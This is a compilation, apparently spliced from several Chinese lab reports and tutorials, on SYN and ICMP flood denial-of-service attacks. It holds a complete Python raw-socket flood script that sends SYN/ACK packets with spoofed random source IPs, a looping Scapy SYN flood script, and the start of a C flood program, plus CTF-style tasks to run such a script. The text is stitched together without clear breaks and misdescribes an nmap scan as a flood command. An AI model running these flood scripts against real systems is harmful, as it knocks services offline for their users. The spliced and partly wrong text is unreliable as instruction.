syn-flood攻击实验报告

SYN攻击实验应用场景随着计算机网络的普及和发展，人们利用网络可以方便快捷地进行各种信息处理，例如，网上办公、电子商务、分布式数据处理等。

但网络也存在不容忽视的问题，例如，用户的数据被篡改、合法用户被冒充、通信被中断等。

面临着大量的网络入侵事件，就必须要求在一个开放式的计算机网络物理环境中构造一个封闭的逻辑环境来保障敏感信息和保密数据不受到攻击。

为此迫切需要对网络安全作分类研究，把各种网络安全问题清楚有序地组织起来，从而构建一个合理、安全、高效的网络防御体系。

网络安全保护的核心是如何在网络环境下保证数据本身的秘密性、完整性与操作的正确性、合法性与不可否认性。

而网络攻击的目的正相反，其立足于以各种方式通过网络破坏数据的秘密性和完整性或进行某些非法操作。

网络及其应用的广泛发展，安全威胁呈现出攻击的种类、方法和总体数量越来越多、破坏性和系统恢复难度也越来越大。

这就要求我们对攻击方法有更进一步的研究;对安全策略有更完善的发展，建立起一个全面的、可靠的、高效的安全体系。

DDOS 全名是Distribution Denial of service (分布式拒绝服务攻击)，指借助于客户/服务器技术，将多个计算机联合起来作为攻击平台，对一个或多个目标发动DoS 攻击，从而成倍地提高拒绝服务攻击的威力。

通常，攻击者使用一个偷窃帐号将DDoS 主控程序安装在一个计算机上，在一个设定的时间主控程序将与大量代理程序通讯，代理程序已经被安装在Internet 上的许多计算机上。

代理程序收到指令时就发动攻击。

利用客户/服务器技术，主控程序能在几秒钟内激活成百上千次代理程序的运行。

Syn Flood 利用了TCP/IP 协议的固有漏洞。

面向连接的TCP 三次握手是Syn Flood 存在的基础。

假设一个用户向服务器发送了SYN 报文后突然死机或掉线，那么服务器在发出SYN+ACK 应答报文后是无法收到客户端的ACK 报文的（第三次握手无法完成），这种情况下服务器端一般会重试（再次发送SYN+ACK 给客户端）并等待一段时间后丢弃这个未完成的连接，这段时间的长度我们称为SYN Timeout，一般来说这个时间是分钟的数量级（大约为30 秒‐2 分钟）；一个用户出现异常导致服务器的一个线程等待1 分钟并不是很严重的问题，但如果有一个恶意的攻击者大量模拟这种情况，服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源，即使是简单的保存并遍历也会消耗非常多的CPU 时间和内存，何况还要不断对这个列表中的IP 进行SYN+ACK 的重试。

一、实验目的
1.SYN洪水攻击
2.ICMP洪水攻击
二、实验内容与步骤
（1）SYN洪水攻击
对目标主机实施SYN洪水攻击的命令：nmap -v –sS -T5 靶机IP地址
（2）ICMP洪水攻击
启用实验平台ICMP洪水攻击工具
三、实验小结
SYN洪水攻击和ICMP洪水攻击尽管都能实现洪水攻击，但是二者的原理不同
1.SYN洪水攻击原理
在TCP连接的三次握手中，假设一个用户向服务器发送了SYN报文后突然死机或掉线，那么服务器在发送SYN+ACK应答报文后是无法收到客户端的ACK报文的，即第三次握手无法完成，成为半连接状态。

这种情况下服务器端一般会新开一个等待线程来负责等待一段时间（SYN Timeout），而服务器里面用来存放等待线程的堆栈一般不会很大。

因此黑客可以大量模拟这种情况，使服务器忙于处理这种半连接状态，最终等待堆栈溢出
2.ICMP洪水攻击原理
a..直接Flood
源IP就是黑客自己的IP，回应ICMP发回到黑客自己
b.伪造IP的Flood
伪造源IP
c.Smurf
结合IP地址欺骗和ICMP回复的方法，使大量回应报文发向攻击目标主机，引起攻击目标系统瘫痪。

信息安全与管理专业实训报告学生姓名：一、实训名称：拒绝服务攻击-TCP SYN Flood攻击与防御。

二、实训内容1、kali的安装部署2、SYN Flood攻击演示3、观察受攻击目标的系统状态4、防御措施三、实验步骤1、python攻击代码环境：ubuntu/kali +python 2.7.11使用方法如下：mode有三种模式syn攻击、ack攻击、混合攻击，虽说是支持多线程但是多个线程反而不如单线程快，估计是我的多线程弄得有些问题，麻烦这方面比较懂的朋友帮我指点一下。

我电脑是i7-6700单线程也只能这点速度。

cpu1已经使用89%了看一下抓包情况吧，因为只是测试用我也没带tcp的options字段，报文长度也不够64字节，不过也能传到目的地址。

下面是代码：#!/usr/bin/python#-*-coding:utf-8-*-import socketimport structimport randomimport threadingclass myThread (threading.Thread):def __init__(self,dstip,dstport,mode):threading.Thread.__init__(self)self.dstip = dstipself.dstport =dstportself.mode =modedef run(self):attack(self.dstip,self.dstport,self.mode)def checksum(data):s = 0n = len(data) % 2for i in range(0, len(data)-n, 2):s+= ord(data[i]) + (ord(data[i+1]) << 8) if n:s+= ord(data[i+1])while (s >> 16):s = (s & 0xFFFF) + (s >> 16)s = ~s & 0xffffreturn sdef IP(source,destination,udplen):version = 4ihl = 5tos = 0tl = 20+udplenip_id = random.randint(1,65535)flags = 0offset = 0ttl = 128protocol =6check =0source = socket.inet_aton(source)destination = socket.inet_aton(destination)ver_ihl = (version << 4)+ihlflags_offset = (flags << 13)+offsetip_header = struct.pack("!BBHHHBBH4s4s",ver_ihl,tos,tl,ip_id,flags_offset,ttl,protocol,check,source,destination)check=checksum(ip_header)ip_header = struct.pack("!BBHHHBBH4s4s",ver_ihl,tos,tl,ip_id,flags_offset,ttl,protocol,socket.htons(check),source,destination)return ip_headerdef TCP(srcip,dstip,protocol,dp,fg):source = socket.inet_aton(srcip)destination = socket.inet_aton(dstip)srcport=random.randint(1,65535)dstport=dpsyn_num=random.randint(1,4000000000)if fg == 2:ack_num=0else:ack_num=random.randint(1,4000000000) hlen=5zero=0flag=fgwindow=8192check=0point=0tcplen=hlenh_f=(hlen << 12)+flagTCP_head=struct.pack("!4s4sHHHHIIHHHH",source,destination,protocol,tcplen,srcport,dstport,s yn_num,ack_num,h_f,window,check,point)check=checksum(TCP_head)TCP_head=struct.pack("!HHIIHHHH",srcport,dstport,syn_num,ack_num,h_f,window,check,point )return TCP_headdef makepacket(dstip,dstport,fg):srcip=str(random.choice(ip_first))+'.'+str(random.randint(1,255))+'.'+str(random.randint(1,255))+'. '+str(random.randint(1,255))protocol=6ippacket=IP(srcip,dstip,5)+TCP(srcip,dstip,protocol,dstport,fg)return ippacketdef attack(dstip,dstport,mode):if mode == 'syn':fg=2while 1:data=makepacket(dstip,dstport,fg)s.sendto(data,(dstip,dstport))elif mode == 'ack':fg=18while 1:data=makepacket(dstip,dstport,fg)s.sendto(data,(dstip,dstport))elif mode == 'syn&ack':while 1:data=makepacket(dstip,dstport,2)s.sendto(data,(dstip,dstport))data=makepacket(dstip,dstport,18)s.sendto(data,(dstip,dstport))else:print 'DON\'T xia say!'dstip=raw_input('attack IP:')dstport=int(input('attack PORT:'))mode=raw_input('mode:(syn or ack or syn&ack)') threads=int(input("线程数threads："))ip_first=[]for i in range(1,10):ip_first.append(i)for i in range(11,172):ip_first.append(i)for i in range(173,192):ip_first.append(i)for i in range(193,224):ip_first.append(i)s = socket.socket(socket.AF_INET,socket.SOCK_RAW,6) s.setsockopt(socket.IPPROTO_IP,socket.IP_HDRINCL,1)threads_name=[]for i in range(threads):threads_name.append('teread'+str(i))for i in range(threads):threads_name[i]=myThread(dstip,dstport,mode)for i in range(threads):threads_name[i].start()2、C语言攻击代码环境：ubuntu/kali gcc version 6.1.1 20160802 (Debian 6.1.1-11)使用方法：支持两个参数目的ip和目的端口性能：限制发包速度的是带宽（我这是100M的网，除去报文的前导码和帧间隔极限速度差不多就是9m左右了），cpu利用才27%，我在1000Mbps的网速下测试，单线程的话速度能到40m左右，cpu占用率大约85%左右。

第1篇一、实验背景随着互联网技术的飞速发展，网络安全问题日益凸显。

其中，泛洪攻击作为一种常见的网络攻击手段，给网络系统带来了极大的威胁。

为了深入了解泛洪攻击的原理和防御方法，我们进行了本次泛洪攻击实验。

二、实验目的1. 理解泛洪攻击的原理和危害；2. 掌握泛洪攻击的实验方法；3. 学习防御泛洪攻击的策略。

三、实验环境1. 操作系统：Windows 102. 虚拟机软件：VMware Workstation3. 实验工具：Scapy四、实验原理泛洪攻击是一种利用目标系统资源耗尽而导致的拒绝服务攻击。

攻击者通过发送大量数据包或请求，使目标系统无法正常处理正常用户请求，从而达到拒绝服务的目的。

常见的泛洪攻击类型包括：1. TCP SYN泛洪攻击：利用TCP三次握手过程中的漏洞，发送大量伪造的SYN请求，使目标系统处于半连接状态，消耗系统资源。

2. UDP泛洪攻击：发送大量UDP数据包，使目标系统无法正常处理正常数据。

3. ICMP泛洪攻击：发送大量ICMP请求，使目标系统无法正常处理网络请求。

五、实验步骤1. 准备实验环境（1）在VMware Workstation中创建两台虚拟机，分别作为攻击者和目标系统。

（2）在攻击者虚拟机上安装Scapy工具。

2. 编写攻击脚本（1）使用Scapy编写TCP SYN泛洪攻击脚本，如下所示：```pythonfrom scapy.all importdef syn_flood(target_ip, target_port):while True:syn_packet = IP(dst=target_ip) / TCP(sport=RandShort(), dport=target_port, flags="S")send(syn_packet)if __name__ == "__main__":target_ip = "192.168.1.2"target_port = 80syn_flood(target_ip, target_port)```（2）运行攻击脚本，对目标系统进行TCP SYN泛洪攻击。

SYN_FLOOD 简单分析及实现声明:此程序有一定攻击性，请只供学习之用，不要危害祖国的网络。

如发动攻击一切后果自负。

网络上发送数据包的攻击有多种（如ICMP_FLOOD, 碎片攻击，等）其中有一种就是利用TCP 协议三次握手的攻击（SYN_FLOOD）。

下面就简单讲述一下 TCP 的三次握手。

现在有A,B 两台机器，其中B是SERVER.A是CLIENT.首先 A 发送送一个带有SYN标记（带起始序列号）的数据报给B。

然后 B 接收，然后发送一个ACK+SYN(带B机的起始序列号和 A的确认号）给A。

最后 A 再发送一个带序列号和确认号的数据报给 B。

此时连接完成。

利用这个原理，如果A机在第一步伪装大量不存在的机器，给B发送大量的SYN包，那么B 会以为有很多合法的机器请求连接，然后一一回应。

然后等待第三次确认建立连接。

那么大量等待连接的请求被保留在栈中。

一般服务器等待2分钟还没等到第三次握手，那么就会从等待连接的栈中删除连接请求。

如果A的SYN发送得足够快，合法用户连接不上，那么服务器也会花费大量的资源来维护栈。

从而照成D.o.S攻击。

通过RAW_SOCKET，只要你是管理员，就可以伪造IP和TCP头部，发虚假源地址的SYN请求。

简单实现如下：/* FLOOD.CPP*/#include <stdio.h>#include <winsock2.h>#include <ws2tcpip.h>#include <windows.h>#include <time.h>#include <dos.h>#pragma comment(lib, "ws2_32.lib")#define MAX_RECEIVEBYTE 255typedef struct ip_head //定义IP首部{unsigned char h_verlen; //4位首部长度,4位IP版本号unsigned char tos; //8位服务类型TOSunsigned short total_len; //16位总长度（字节）unsigned short ident; //16位标识unsigned short frag_and_flags; //3位标志位（如SYN,ACK，等）unsigned char ttl; //8位生存时间 TTLunsigned char proto; //8位协议 (如ICMP，TCP等)unsigned short checksum; //16位IP首部校验和unsigned int sourceIP; //32位源IP地址unsigned int destIP; //32位目的IP地址}IPHEADER;typedef struct tcp_head //定义TCP首部{USHORT th_sport; //16位源端口USHORT th_dport; //16位目的端口unsigned int th_seq; //32位序列号unsigned int th_ack; //32位确认号unsigned char th_lenres; //4位首部长度/6位保留字unsigned char th_flag; //6位标志位USHORT th_win; //16位窗口大小USHORT th_sum; //16位校验和USHORT th_urp; //16位紧急数据偏移量}TCPHEADER;typedef struct tsd_head //定义TCP伪首部{unsigned long saddr; //源地址unsigned long daddr; //目的地址char mbz;char ptcl; //协议类型unsigned short tcpl; //TCP长度}PSDHEADER;//CheckSum:计算校验和的子函数USHORT checksum(USHORT *buffer, int size) {unsigned long cksum=0;while(size >1){cksum+=*buffer++;size -=sizeof(USHORT);}if(size){cksum += *(UCHAR*)buffer;}cksum = (cksum >> 16) + (cksum & 0xffff);cksum += (cksum >>16);return (USHORT)(~cksum);}void usage(){printf("***********************************************************"); printf("SYN_FLOOD MADE BY LionD8");printf("Useage: FLOOD Target_ip Target_port Delay_time ");printf("***********************************************************"); }//Delay_time单位为毫秒。

1、SYN Flood网络渗透测试（难）拓扑结构：任务环境说明：攻击机：物理机操作系统：Windows7 64位旗舰版虚拟机操作系统：Ubuntu Linux 32bit虚拟机操作系统安装工具集：BackTrack5虚拟机网卡与物理机网卡之间的关系：Bridge（桥接）用户名：root，密码：toor靶机：服务器场景：CentOS5.5服务器场景操作系统：CentOS5.5服务器场景用户名：root，密码：123456难度：高级1.进入虚拟机操作系统：Ubuntu Linux 32bit中的/root目录，完善该目录下的synflood.py文件，填写该文件当中空缺的Flag1字符串，将该字符串作为Flag值（形式：Flag1字符串）提交；（synflood.py脚本功能见该任务第6题）2.进入虚拟机操作系统：Ubuntu Linux 32bit中的/root目录，完善该目录下的synflood.py文件，填写该文件当中空缺的Flag2字符串，将该字符串作为Flag值（形式：Flag2字符串）提交；（synflood.py脚本功能见该任务第6题）3.进入虚拟机操作系统：Ubuntu Linux 32bit中的/root目录，完善该目录下的synflood.py文件，填写该文件当中空缺的Flag3字符串，将该字符串作为Flag值（形式：Flag3字符串）提交；（synflood.py脚本功能见该任务第6题）4.进入虚拟机操作系统：Ubuntu Linux 32bit中的/root目录，完善该目录下的synflood.py文件，填写该文件当中空缺的Flag4字符串，将该字符串作为Flag值（形式：Flag4字符串）提交；（synflood.py脚本功能见该任务第6题）5.进入虚拟机操作系统：Ubuntu Linux 32bit中的/root目录，完善该目录下的synflood.py文件，填写该文件当中空缺的Flag5字符串，将该字符串作为Flag值（形式：Flag5字符串）提交；（synflood.py脚本功能见该任务第6题）6.在虚拟机操作系统：Ubuntu Linux 32bit下执行synflood.py文件，对靶机服务器进行SYN Flood网络渗透测试，渗透测试能够实现：在攻击机端或在靶机端的协议分析工具中，能够发现靶机遭受到了SYNFlood渗透测试；并观察靶机端收到的第1000个SYN Flood数据包，该数据包在攻击机中的命令行窗口的显示状态信息的第三行中的唯一一个数字作为Flag值提交；。